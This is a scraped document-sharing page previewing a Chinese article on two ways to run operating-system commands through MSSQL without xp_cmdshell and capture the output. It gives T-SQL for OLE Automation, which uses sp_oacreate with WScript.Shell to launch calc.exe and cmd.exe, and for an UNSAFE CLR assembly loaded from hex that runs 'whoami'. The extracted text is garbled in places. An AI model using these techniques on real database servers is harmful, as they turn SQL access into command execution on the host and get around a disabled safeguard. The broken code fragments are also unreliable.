mssql不使用x p_shell执行命令并获取回显的两种方法 作者未知_W_第1页
mssql不使用x p_shell执行命令并获取回显的两种方法 作者未知_W_第2页
mssql不使用x p_shell执行命令并获取回显的两种方法 作者未知_W_第3页
mssql不使用x p_shell执行命令并获取回显的两种方法 作者未知_W_第4页
免费预览已结束,剩余1页可下载查看

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、MSSQL不使用xp_cmdshell执行命令并获取回显的两种方法作者:未知 原文链接:/p/33322584 收集整理:/test/index.php本文由 干货1S 首发于蛇皮安全写文章MS一句话介绍 16 人赞同了该文章之前写过一篇文章介绍的是MSSQL里使用xp_cmdshell来执行命令的两种姿势:/mssql- sqli-get.很多时候xp_cmdshell会被禁用删除之类的,恢复方法百度也能搜到。 这里再额外介绍两种MSSQL执行命令并获取回显的方法。 1.COM参考文档:do

2、/en-u.2 M$做的东西,怎么可能不能直接调COM呢。百度上相关的资料大多数就是直接用wscript.shell run执行命令重定向输出到文件,都是转载的,早已不知道原始出处。wscript.shell明明还有一个exec方法能直接获取输出好么。 于是我翻了下微软文档,写了试试确实可以: declare luan int,exec int,text int,str varchar(8000);exec sp_oacreate 72C24DD5-D70A-438B-8A42-98424B88AFB8,luan output;-exec sp_oamethod

3、 luan,run,null,calc.exe;exec sp_oamethod luan,exec,exec output,C:Icmd.eexec sp_oamethod exec, StdOut, text out;exec sp_oamethod text, readall, str outselect str;3 当然还有别的COM组件可以利用,比如常见的Application.shell等等。 2.CLR这个就不多介绍了,百度有很多。 可以看做成mysql的udf,不过可以直接使用16进制代码来创建自定义函数,不需要写文件,很方 便。 4

4、-DROP ASSEMBLY luan_exec;-DROP FUNCTION dbo.shell;-alter database master set trustworthy on;-CREATE ASSEMBLY luan_exec FROM 0x4d5a90000300000004000000ffff0000b8000000000000-WITH PERMISSION_SET = UNSAFE;-CREATE FUNCTION dbo.shell(exe as nvarchar(200),arg as nvarchar(200)RETURNS nSELECT dbo.shell(C:Icmd.exe,/c whoami)发布于

人人文库> 全部分类> 应用文书

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论